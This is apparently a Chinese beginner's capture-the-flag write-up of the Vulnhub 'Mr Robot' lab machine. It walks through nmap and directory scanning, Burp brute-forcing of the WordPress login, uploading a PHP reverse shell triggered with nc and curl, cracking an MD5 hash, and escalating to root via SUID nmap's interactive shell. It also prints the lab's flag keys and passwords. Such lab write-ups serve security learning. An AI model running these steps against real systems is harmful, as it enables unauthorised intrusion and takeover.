Vulnhub是一个很好的靶机平台,想看官网点这里
今天学习mrRobot,点击这里下载哦~
这个比较简单,入门学习,大佬可以绕过哦…
VMware和VirtualBox都可以导入
成功后如图:
这里启用NAT模式
攻击机 kali 192.168.81.140
靶机:192.168.81.146
这个时候继续拿出祖传的nmap神器扫描:
nmap -A 192.168.81.146
有80、443,直接浏览器访问:
继续看看有啥有价值的
先用dirsearch扫一下目录:
通过扫描发现是一个wp博客
有robots文件:
进去看看:
得到第一个key:073403c8a58a1f80d943455fb30724b9
看命名,应该是有3个key
还有个字典文件,下载下来
还扫到了wp登录界面:
利用之前的字典bp爆破一下:
配好代理,拦截包:
发送到Intruder:
设置好爆破点
(这里先爆破用户名,两个一起爆破,好家伙,太多了)
导入下载的字典:
开始(kali自带的bp限制了线程,慢如蜗牛):
不过用户名靠前,出来了Elliot
接下来爆破密码得到密码
ER28-0652
之后登陆后台:
找到一个上传点:
直接上传shell:
这里我用的是kali自带的shell,
在/usr/share/webshells/php/php-reverse-shell.php
修改监听ip
然后在media里找到了上传的shell
打开找到了地址;
再打开一个窗口监听:
nc -lvp 1234
然后访问:
curl http://192.168.81.146/wp-content/uploads/2021/04/php-reverse-shell1.php
获得shell:
是一个普通用户
查看linux内核
这里没得到提权信息,emmmmm
这里通过python打开bash
python -c 'import pty;pty.spawn("/bin/bash");'
在/home/
目录下发现了两个文件,key没有权限,发现一串MD5
c3fcd3d76192e4007dfb496cca67e13b
解密:
robot/abcdefghijklmnopqrstuvwxyz
su robot
密码 abcdefghijklmnopqrstuvwxyz
(这里我也不知道为啥显示双,密码直接复制进去即可)
这里得到第二个key
822c73956184f694993bede3eb39f959
完成第二步
继续查看用户信息,是否可以提权
find / -perm -4000 2>/dev/null
这里看到有nmap,查看版本
nmap -v
nmap2.02-5.21的版本可以执行命令
nmap --interactive
然后输入!sh
这里可以看到获得root权限。。
在root目录下,获得第三个key,至此完成测试。
~~《小白测试》